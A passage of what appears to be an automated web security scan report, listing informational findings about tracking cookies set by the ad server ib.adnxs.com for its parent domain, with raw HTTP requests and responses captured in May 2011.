Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; path=/; expires=Sun, 07-Aug-2011 15:35:11 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 15:35:11 GMT
Content-Length: 1357

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bad56300\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/mpmZmZmZ-T-amZmZmZn5PwAA
...[SNIP]...

10.23. http://ib.adnxs.com/acb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /acb

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /acb?member=311&width=728&height=90&pb=280&cb=2507990&referrer= HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acb145072=5_[r^kI/7ZVO@Lm*bfY>AYR8I?enc=FK5H4XoUCkBFtvP91HgHQAAAAKCZmfk_Rbbz_dR4B0AUrkfhehQKQNspbpGFnStGSsYda6b2ziUcCshNAAAAACgjBgA3AQAAHgAAAAMAAAAmSAUAar8AAAEAAABVU0QAVVNEANgCWgCqAQAA3xABAgUCAAUAAAAAfyE2KQAAAAA.&tt_code=cm.rub_usatoday&click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf%26redirectURL=&pixel=http://va.px.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26creativeID=113105%26message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf%26managed=false; sess=1; icu=ChIIhboCEAoYASABKAEwnZSg7gQQnZSg7gQYAA..; acb933293=5_[r^kI/7Zw[-!!0nf8MAYR8I?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jPzF8xuA56TROSsYda6b2ziUdCshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAAFBABAgUCAAUAAAAA6yROvQAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955445%29%3Buf%28%27c%27%2C+61473%2C+1304955445%29%3Buf%28%27r%27%2C+272040%2C+1304955445%29%3Bppv%287166%2C+%275635385468540845105%27%2C+1304955445%2C+1336491445%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_VtN.!fFc)4A9CkOy>5#Y2:H9+'(s':?6bLT2bujaqZM1q=3$<oxAN2R+-Q=f*ZD9q01F/yR!pPep@lhr?6lR5#u^LepX@-Bq@%t>BCt6LR9nqEku7!%x^cbAH:CBp4SoB_g)flf'+AW^8$vA%+R@BlT0>Og>^(#8Df^Mjo0*A?Rk8fO`zgI/(/6j]*nXBx`1s6=M3kv/VxS`aeS9/q?'v_7C+:@wG$N2=H<:IL#14#$D?40tLzI7=H'2$jLWN7CRm/8$vYZ!X@-8eFH`<@QU6Hj+1jDBpEB`8OjKb'GjgX8RAnuKCH.)XGBs/J*S:!cS[S?s$.iZwpczluvIHD7:hcBh=OMr6>JCzU3a>.GYzcjXc/wl$jxr6gM]N:Juk`F$fOJ>VqTH878oNWsnzJf=VOiSkZWN62OH1jwf[jvq%+U<RPfFF?JO'GuCZTEo.S'$TmrW>o(Q%@XomCXfdO.cX7MxB^OTpJ)U_<-[pmSCx0$Tnvy]D=wvcAfmROfiaS6^vmJJpx.1]4YgsAD[$hbMf827(omrkIHMu4m(=%V4yO-<vwSX0@uimPr?_!$6mB1.>xJj+Km$psS8m[pFyvxb1!cI4mu./=I>2v+AHbIE.bvpEgK*U.!FLR(G7Qv#Y*

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:37:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb145072=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0s(F?Mc9aQ3p9'^<S@I)Ql?!>Ae1f''iDi%3^'oLfC].kus@gU@%TxzHNX4[`WiVr*#9$vly>pFw2R!S3(%@w4<XPfGwI=KFxaLe[#mlK'C6EcG7hQU*o4SxrFd%j8zSG'hZ^D=OGMdEBEY11Uo_(eivJEYD@Ho?(^)etsLR7z'ns49!Ux5mR>#lMG'iLd<GTD$#AwtORJ@vBPA8q:p2Hv8s$nLSw`@cT6'=rqvg/PJyYt[-L!L(s`](-sRB6bA$j7/8l`/qMkYNHmLjx!j+Cat8-(!nXx8T`oWuF:Y11:LvJSN%2pSV-#:g'=Sb.-<6h+YEM%gG@w_9^gcM7pD=!j6CenGiB7>kko?i=<)!e3YI4KDvQEb`X8)alPKr$ETqBnzTMkQg+%-)erfq'IW*l8wrT7cUm4]3SP4j+tx.U-$'YUm@*y6x(A3H+*S0$getvNu.MeHeUf-#2%G*>DY/A<By?VIzutD*g8cKK+`6>[DwWqbhOid^wC>`:mn[J>?-#Fp6<W)3Xikw.$@ePbWiO6d:_'xt%OTZIzzfW[Loft(ZmLx[_-MtHVG'T'sPt9ssVv3fjt4@6bcwvH%-]h'oo`t?2P/4nA!gq([Ift!^HL*Xe]Z0f#*hQ*v9^cJiiW^]P3'vI-$iNx:M; path=/; expires=Sun, 07-Aug-2011 15:37:08 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 15:37:08 GMT
Content-Length: 2841

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">function writeJS(doc){
var str='';
str += '<script type="text\/javascript"> \n';
...[SNIP]...

10.24. http://ib.adnxs.com/getuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://matcher-apx.bidder7.mookie1.com/appnexus?adnxs_uid= HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIhboCEAoYAiACKAIw4pSg7gQQ4pSg7gQYAQ..; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0s(F?MZLVSh`#>:`0`WW1(8g]RLPfbGhP:t/X(N=g3]%zH1@gU@%TxzFyMpF8#2ZS9N/Wuft/yR0tPsQ5U^geeVQTEc[7)3dU7eOC^p-u?:VGSah7Q=X?80Yp2LItDKo5KF@=(](`Ksb^3L>1?2KGL7SayTg7G.(0t$'jw_MJWRI3ScuGPZxluNNFnCCJPuqw.R(*S5Q.0VPjnm>@dEl:hrjd>IObXEMOWc10PCZ#:AC98<SRvJ?jr$PlNXO^z-r6%a_yk`*qBJI>blx8BQ>ZHi5[N!/Dz6)yJ<-?7cK+>z6/PCfI![Eg2zT$9.A#Rgu'*nw8yClo/.yZOhK).s<[8(GVLhu'f?x5NR3'O>QTvqi<N3s*p/AnG=wfH)En(q$8wH]sy<S.!O0UcLX0fdL.T(>D$`K9.LlOsosU38T(oFdkSzMu]lWh/[1h0)/K7xc$[fvmvGXvMdp?igeWn</VHw@P9lAaMY=jfA'BYkF0'H]Qkv.Ru%g619/*`K+^$euSVt(vOz1bR.jLdTK=9/ru/xg]rpX!eBc97)c77Z!hD:z*pBk.q5cEd#aAw`^ac2`!bX=%fnVKG$Msxef5K$qR03Qx>=#h%VZ$RW/WY[Tts%HHDk$yjpv0Q5ZEt>ghVfv79mwSjLafXH`Byo%!

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:39:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:39:28 GMT; domain=.adnxs.com; HttpOnly
Location: http://matcher-apx.bidder7.mookie1.com/appnexus?adnxs_uid=
Date: Mon, 09 May 2011 15:39:28 GMT
Content-Length: 0


10.25. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rub_usatoday&size=728x90&imp_id=cm-65201734_1304955420,11f8f328940989e&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rub_usatoday%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-65201734_1304955420%2C11f8f328940989e%2Cweath%2Cax.{PRICEBUCKET}-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D637150%3Bcontx%3Dweath%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dam.h%3Bbtg%3Dam.b%3Bbtg%3Dcm.ent_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_VsdNmQotNi@m4]2M2UNvB^a*m(qsP<$5Y8+$btG4Ak815t9uZT9Y!Tss2(U=u08T#U*@.xf`p:/Y=@C'V`%3VDqSpO@2LNZ!a`mkrE=4S%OOWjxx?I%f.`8P<Q_=:K!N$S@p'W+mpx*RcdvEi=A'#X@PH+HTK.^[b/a`!b`#0B@$kf.F^2QqXMVbeza'$l/3mV)X=JbA6Dg2elt<r$Y2-LH'3+IRb[FhsHCNft/g2g4RKbYm([]%2pZmoc2O!J^AMCh5bcwNx(n]g=GtY31<eFv=Py[$vPQoKQvElD]jJ?WfA/mkYXJ7^YX%RfRfRP:B4Z:9)LOWaVQ._BYWVIt9SF3qfRr>MH2W4cYAiW:f92EX!%l#-=WZMff'fhbMApWS<YV1Fhq@f^5^1!7tcd#9Tdp::!P@XBy<13HmsxW[=X*.JJZAZnXKfBb0ZkTQDm.8h6r:GEYo'apKW77#x>UomXwbCI8b[s00xdd5UEfSDB=f<o'@gNUP)v6ITb?O-]le_)Ef0+aq9aCbvK/[`(!X92Jj!xp88_699MG!SR'2XPaU>9U<.1_BU7EhhEGpC$Dl]#Jj1o$JVk<kds/pZAV[23<*Wg2v^crt$`<vw8HjZ)4K>b:4bVPY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIhboCEAoYASABKAEwnZSg7gQQnZSg7gQYAA..; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb933293=5_[r^kI/7Zw[-!!0nf8MAYR8I?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jPzF8xuA56TROSsYda6b2ziUdCshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAAFBABAgUCAAUAAAAA6yROvQAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955445%29%3Buf%28%27c%27%2C+61473%2C+1304955445%29%3Buf%28%27r%27%2C+272040%2C+1304955445%29%3Bppv%287166%2C+%275635385468540845105%27%2C+1304955445%2C+1336491445%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; path=/; expires=Tue, 10-May-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_VtN.!fFc)4A9CkOy>5#Y2:H9+'(s':?6bLT2bujaqZM1q=3$<oxAN2R+-Q=f*ZD9q01F/yR!pPep@lhr?6lR5#u^LepX@-Bq@%t>BCt6LR9nqEku7!%x^cbAH:CBp4SoB_g)flf'+AW^8$vA%+R@BlT0>Og>^(#8Df^Mjo0*A?Rk8fO`zgI/(/6j]*nXBx`1s6=M3kv/VxS`aeS9/q?'v_7C+:@wG$N2=H<:IL#14#$D?40tLzI7=H'2$jLWN7CRm/8$vYZ!X@-8eFH`<@QU6Hj+1jDBpEB`8OjKb'GjgX8RAnuKCH.)XGBs/J*S:!cS[S?s$.iZwpczluvIHD7:hcBh=OMr6>JCzU3a>.GYzcjXc/wl$jxr6gM]N:Juk`F$fOJ>VqTH878oNWsnzJf=VOiSkZWN62OH1jwf[jvq%+U<RPfFF?JO'GuCZTEo.S'$TmrW>o(Q%@XomCXfdO.cX7MxB^OTpJ)U_<-[pmSCx0$Tnvy]D=wvcAfmROfiaS6^vmJJpx.1]4YgsAD[$hbMf827(omrkIHMu4m(=%V4yO-<vwSX0@uimPr?_!$6mB1.>xJj+Km$psS8m[pFyvxb1!cI4mu./=I>2v+AHbIE.bvpEgK*U.!FLR(G7Qv#Y*; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 15:37:01 GMT
Content-Length: 701

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rub_usatoday/;net=cm;u=,cm-65201734_1304955420,11f8f328940989e,weath,ax.40-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-b
...[SNIP]...

10.26. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rub_usatoday&size=728x90&imp_id=cm-45954758_1304955419,11f8f328940989e&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rub_usatoday%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-45954758_1304955419%2C11f8f328940989e%2Cweath%2Cax.{PRICEBUCKET}-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D310802%3Bcontx%3Dweath%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dam.h%3Bbtg%3Dam.b%3Bbtg%3Dcm.ent_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_VsdNmQotNi@m4]2M2UNvB^a*m(qsP<$5Y8+$btG4Ak815t9uZT9Y!Tss2(U=u08T#U*@.xf`p:/Y=@C'V`%3VDqSpO@2LNZ!a`mkrE=4S%OOWjxx?I%f.`8P<Q_=:K!N$S@p'W+mpx*RcdvEi=A'#X@PH+HTK.^[b/a`!b`#0B@$kf.F^2QqXMVbeza'$l/3mV)X=JbA6Dg2elt<r$Y2-LH'3+IRb[FhsHCNft/g2g4RKbYm([]%2pZmoc2O!J^AMCh5bcwNx(n]g=GtY31<eFv=Py[$vPQoKQvElD]jJ?WfA/mkYXJ7^YX%RfRfRP:B4Z:9)LOWaVQ._BYWVIt9SF3qfRr>MH2W4cYAiW:f92EX!%l#-=WZMff'fhbMApWS<YV1Fhq@f^5^1!7tcd#9Tdp::!P@XBy<13HmsxW[=X*.JJZAZnXKfBb0ZkTQDm.8h6r:GEYo'apKW77#x>UomXwbCI8b[s00xdd5UEfSDB=f<o'@gNUP)v6ITb?O-]le_)Ef0+aq9aCbvK/[`(!X92Jj!xp88_699MG!SR'2XPaU>9U<.1_BU7EhhEGpC$Dl]#Jj1o$JVk<kds/pZAV[23<*Wg2v^crt$`<vw8HjZ)4K>b:4bVPY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:37:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIhboCEAoYASABKAEwoJSg7gQQoJSg7gQYAA..; path=/; expires=Sun, 07-Aug-2011 15:37:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb745993=5_[r^kI/7ZVO@Lm*bfY>BVNTL?enc=FK5H4XoUCkBFtvP91HgHQAAAAKCZmfk_Rbbz_dR4B0AUrkfhehQKQGhEAHWOLGYHSsYda6b2ziUgCshNAAAAACgjBgA3AQAAHgAAAAMAAACHbQUAar8AAAEAAABVU0QAVVNEANgCWgCqAQAA2xABAgUCAAUAAAAAtyCf0wAAAAA.&tt_code=cm.rub_usatoday&click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtizkOgDAMBL8SuabIro_IvCmio0L8HVuimhmt_YiqnCMm1jFE2Y50ZBUqxFUR9AxaJmg06cOelnOurv5i0X9a8br3Lo1SM8f7ARNbFDE-%26redirectURL=&pixel=http://va.px.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26creativeID=114297%26message=eJwtizkOgDAMBL8SuabIro_IvCmio0L8HVuimhmt_YiqnCMm1jFE2Y50ZBUqxFUR9AxaJmg06cOelnOurv5i0X9a8br3Lo1SM8f7ARNbFDE-%26managed=false; path=/; expires=Tue, 10-May-2011 15:37:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_VtN.!fFc)4A9CkOy>5#Y2:H9+'(s':?6bLT2bujaqZM1q=3$<oxAN2R+-Q=f*ZD9q01F/yR!pPep@lhr?6lR5#u^LepX@-Bq@%t>BCt6LR9nqEku7!%x^cbAH:CBp4SoB_g)flf'+AW^8$vA%+R@BlT0>Og>^(#8Df^Mjo0*A?Rk8fO`zgI/(/6j]*nXBx`1s6=M3kv/VxS`aeS9/q?'v_7C+:@wG$N2=H<:IL#14#$D?40tLzI7=H'2$jLWN7CRm/8$vYZ!X@-8eFH`<@QU6Hj+1jDBpEB`8OjKb'GjgX8RAnuKCH.)XGBs/J*S:!cS[S?s$.iZwpczluvIHD7:hcBh=OMr6>JCzU3a>.GYzcjXc/wl$jxr6gM]N:Juk`F$fOJ>VqTH878oNWsnzJf=VOiSkZWN62OH1jwf[jvq%+U<RPfFF?JO'GuCZTEo.S'$TmrW>o(Q%@XomCXfdO.cX7MxB^OTpJ)U_<-[pmSCx0$Tnvy]D=wvcAfmROfiaS6^vmJJpx.1]4YgsAD[$hbMf827(omrkIHMu4m(=%V4yO-<vwSX0@uimPr?_!$6mB1.>xJj+Km$psS8m[pFyvxb1!cI4mu./=I>2v+AHbIE.bvpEgK*U.!FLR(G7Qv#Y*; path=/; expires=Sun, 07-Aug-2011 15:37:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 15:37:04 GMT
Content-Length: 703

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rub_usatoday/;net=cm;u=,cm-45954758_1304955419,11f8f328940989e,weath,ax.280-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-
...[SNIP]...

10.27. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rub_usatoday&size=728x90&imp_id=cm-49643098_1304955489,11f8f328940989e&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rub_usatoday%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-49643098_1304955489%2C11f8f328940989e%2Cweath%2Cax.{PRICEBUCKET}-am.h-am.b-cm.ent_h-cm.music_h-cm.weath_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-mm.ag1-mm.ak1-mm.am1-mm.aq1-idgt.careers_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D595286%3Bcontx%3Dweath%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dam.h%3Bbtg%3Dam.b%3Bbtg%3Dcm.ent_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dcm.weath_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Dmm.ag1%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.am1%3Bbtg%3Dmm.aq1%3Bbtg%3Didgt.careers_l%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIhboCEAoYASABKAEwnZSg7gQQnZSg7gQYAA..; acb933293=5_[r^kI/7Zw[-!!0nf8MAYR8I?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jPzF8xuA56TROSsYda6b2ziUdCshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAAFBABAgUCAAUAAAAA6yROvQAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955445%29%3Buf%28%27c%27%2C+61473%2C+1304955445%29%3Buf%28%27r%27%2C+272040%2C+1304955445%29%3Bppv%287166%2C+%275635385468540845105%27%2C+1304955445%2C+1336491445%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; sess=1; uuid2=2724386019227846218; 